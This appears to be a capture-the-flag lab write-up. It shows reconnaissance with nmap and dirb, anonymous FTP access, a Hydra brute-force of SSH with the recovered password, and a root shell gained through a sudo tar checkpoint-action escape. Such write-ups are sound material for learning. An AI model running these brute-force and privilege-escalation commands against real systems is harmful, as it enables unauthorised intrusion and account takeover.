To begin, I enumerated what was open on the machine with nmap.

sudo nmap -sV -sS -p- 10.10.224.157 –open

This resulted in the below results:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 14:09 EDT
2022-09-09 14:13:44 Authenticate/Decrypt packet error: packet HMAC authentication failed
2022-09-09 14:13:48 Authenticate/Decrypt packet error: packet HMAC authentication failed
Nmap scan report for 10.10.224.157
Host is up (0.10s latency).
Not shown: 56728 filtered tcp ports (no-response), 8804 closed tcp ports (reset)
Some closed ports may be reported as filtered due to –defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 396.49 seconds

Seeing that there was an HTTP port open, (80), I then ran a dirb scan to enumerate the web directories:

dirb http://10.10.224.157 -r

With these results:

—————-
DIRB v2.22
By The Dark Raver
—————–

START_TIME: Fri Sep 9 14:17:32 2022
URL_BASE: http://10.10.224.157/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

—————–

GENERATED WORDS: 4612

—- Scanning URL: http://10.10.224.157/ —-
==> DIRECTORY: http://10.10.224.157/images/
+ http://10.10.224.157/index.html (CODE:200|SIZE:969)
+ http://10.10.224.157/server-status (CODE:403|SIZE:278)

—————–
END_TIME: Fri Sep 9 14:25:10 2022
DOWNLOADED: 4612 – FOUND: 2

I looked through the pages listed here, but couldn’t find anything of any value. I then took a look at the FTP site.

ftp 10.10.224.157 21

I was able to login as anonymous and saw this hosted two files, task.txt and locks.txt.

Tasks.txt was as below:

1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.

-lin

Which gave me a username. Locks.txt was simply a wordlist. Combining the two, I could perform a Hydra attack against SSH:

hydra -l lin -P locks.txt ssh://10.10.224.157

This found the credentials for lin:

[22][ssh] host: 10.10.224.157 login: lin password: RedDr4gonSynd1cat3

Once I logged in as lin via ssh, I did my usual enumeration steps of finding the basic operating system information, getting the passwd file, checking permissions and tmp directories as well as crontab.

From this, I did notice the machine was vulnerable to PwnKit but decided to see if I could find another method. I searched for SUIDs, but didn’t come up with anything useful. However, when checking what programs lin could run as sudo with sudo -l, I saw that the user could run tar as sudo.

I checked this against GTFObins and found an escalation path.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Running this gave me root access and full control of the machine.